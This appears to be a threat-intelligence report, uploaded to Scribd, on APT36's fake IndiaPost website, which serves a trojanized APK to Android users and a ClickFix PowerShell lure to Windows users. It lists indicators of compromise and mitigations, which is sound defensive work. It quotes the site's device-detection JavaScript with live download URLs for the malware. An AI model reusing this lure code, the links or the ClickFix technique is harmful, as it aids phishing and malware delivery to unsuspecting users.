Scribd
Upload
10 views

APT Hackers

Pakistan-based APT group APT36 has launched a sophisticated cyber attack using a fraudulent IndiaPost website to target Windows and Android users. The attack delivers malware through device-specific payloads, with Windows users prompted to download a malicious PDF and Android users directed to install a trojanized APK. Recommendations for mitigation include enhancing endpoint security, user awareness, and implementing strict network security measures.

Uploaded by

nigeyis893
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
10 views

APT Hackers

Pakistan-based APT group APT36 has launched a sophisticated cyber attack using a fraudulent IndiaPost website to target Windows and Android users. The attack delivers malware through device-specific payloads, with Windows users prompted to download a malicious PDF and Android users directed to install a trojanized APK. Recommendations for mitigation include enhancing endpoint security, user awareness, and implementing strict network security measures.

Uploaded by

nigeyis893
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

Pakistan APT Hackers Create Weaponized IndiaPost Website to Attack

Windows & Android Users

Document Control

Pakistan APT Hackers Create Weaponized IndiaPost Website to Attack Windows &
Android Users

Document No:
Revision Status:
Effective Date:
Last Review Date:
Approved by
Preparer Name:
Signature
Date:

Document Revision History

Publication Date Author Revision No Change Description

Tushar Subhra Initial Document


27-03-2025 -
Dutta Creation

Table of Contents

1. Introduction
2. Incident Overview
3. Attack Methodology
4. Indicators of Compromise (IoCs)
5. Recommendations
6. Conclusion
7. References
1. Introduction

Cybersecurity researchers have uncovered a sophisticated attack campaign leveraging a fraudulent


website impersonating the Indian Post Office. The attack is designed to target both Windows and
Android users, delivering malware through tailored malicious payloads. The campaign
demonstrates advanced techniques used by Pakistan-based Advanced Persistent Threat (APT)
group APT36 (Transparent Tribe), known for targeting Indian entities since 2013.

2. Incident Overview

The malicious website, hosted at postindia[.]site, employs device detection mechanisms to deliver
operating system-specific payloads:

• Windows Users: Prompted to download a malicious PDF containing instructions to


execute a PowerShell command.
• Android Users: Encouraged to download a trojanized APK (indiapost.apk) that requests
extensive permissions to compromise sensitive data.
Malicious Indiapost.apk (Source – Cyfirma)

Researchers from Cyfirma identified this campaign in March 2025, linking its origin to Pakistan
through forensic metadata analysis. The attack infrastructure includes IP addresses and domains
crafted to mimic Indian government entities, a known tactic of APT36.

3. Attack Methodology

3.1. Initial Access

• The victim is lured to postindia[.]site via phishing emails or social engineering tactics.
• The website detects the visitor’s device type using JavaScript.

3.2. Payload Delivery

• Windows: Users are prompted to download a PDF with “ClickFix” instructions that
execute a PowerShell command, deploying malware.
• Android: Users receive a download prompt for indiapost.apk, which disguises itself as a
Google Accounts app.

3.3. Execution & Persistence

• The Android malware leverages the BootReceiver function for persistence.


• The malware requests excessive permissions, including access to contacts, location, and
clipboard data.
• The APK bypasses battery optimization to maintain continuous operation.

3.4. Command & Control (C2) Communication

• The malware communicates with C2 infrastructure linked to domains mimicking Indian


government sites.
• The identified IP address 88[.]222[.]245[.]211 is associated with these operations.

❖ Infection Mechanism Analysis

The infection mechanism of this campaign showcases a multi-platform approach, using


JavaScript-based device detection to deliver tailored payloads.

Web-Based Device Detection

• The malicious website uses JavaScript to differentiate between desktop and mobile users.
• Depending on the device type, the user is served either a Windows-based attack vector
(PDF download) or an Android-based malware (APK download).

function detectDevice() {
const isMobile =
/iPhone|iPad|iPod|Android/.test(navigator.userAgent);
if (isMobile) {
dialogTitle.textContent = "Get Our App";
actionButton.href =
"https://postindia.site/download/indiapost.apk";
} else {
dialogTitle.textContent = "Download Tracking Information";
actionButton.href =
"https://drive.usercontent.google.com/download?id=1RSILmV3HDR6APXKWEPX
rg2MRP1d2xwmb&export=download";
}
}
HTML code contains a JavaScript function

Windows Infection Process

• Users are tricked into downloading a malicious PDF containing “ClickFix” instructions.
• The PDF instructs victims to press Win+R and execute a PowerShell command, leading to
malware installation.
• The PowerShell script downloads and executes further payloads to establish persistence
and exfiltrate data.

Android Infection Process

• The APK file (indiapost.apk) masquerades as a Google Accounts app.


• Once installed, it requests excessive permissions such as:
o Access to contacts
o Location tracking
o Clipboard monitoring
• The malware ensures persistence using the BootReceiver function, automatically
relaunching upon device reboot.
• It bypasses battery optimization settings to maintain continuous operation and
communication with its C2 server.
Attack Chain

4. Indicators of Compromise (IoCs)

4.1. Malicious Domains & IPs

• postindia[.]site
• email[.]gov[.]in[.]gov-in[.]mywire[.]org
• 88[.]222[.]245[.]211

4.2. Malicious Files

• indiapost.apk
• PDF file containing PowerShell execution commands

4.3. Tactics, Techniques, and Procedures (TTPs)

• Social engineering through phishing websites


• Device-aware payload distribution
• Malware persistence via BootReceiver
• Evasion techniques to bypass security controls
5. Recommendations

To mitigate risks associated with this attack campaign, organizations should implement the
following security measures:

5.1. Endpoint Security

• Deploy Endpoint Detection and Response (EDR) solutions to detect and block malicious
activity.
• Ensure Windows Defender and third-party AV solutions are updated with the latest
signatures.

5.2. User Awareness & Training

• Educate users on recognizing phishing attempts and suspicious websites.


• Instruct users to avoid executing unknown PowerShell commands.

5.3. Mobile Security Measures

• Restrict APK installations from unknown sources.


• Implement Mobile Device Management (MDM) to enforce security policies.
• Monitor devices for unauthorized applications requesting excessive permissions.

5.4. Network Security

• Block IoCs at the firewall and proxy level.


• Monitor DNS requests for suspicious domain activity.
• Enforce strict access control policies to prevent unauthorized execution of scripts.

5.5. Incident Response Preparedness

• Conduct regular threat hunting activities to identify potential compromises.


• Establish an incident response plan for handling suspected APT activities.

6. Conclusion

The latest campaign by APT36 highlights the evolving sophistication of nation-state-sponsored


cyber threats. By leveraging fake government websites, targeted malware payloads, and advanced
persistence techniques, the attackers aim to compromise both Windows and Android users.
7. References

• Cyber Security News - Computer Security | Hacking News | Cyber Attack News
• Pakistan APT Hackers Create Weaponized IndiaPost Website to Attack Windows &
Android Users

You might also like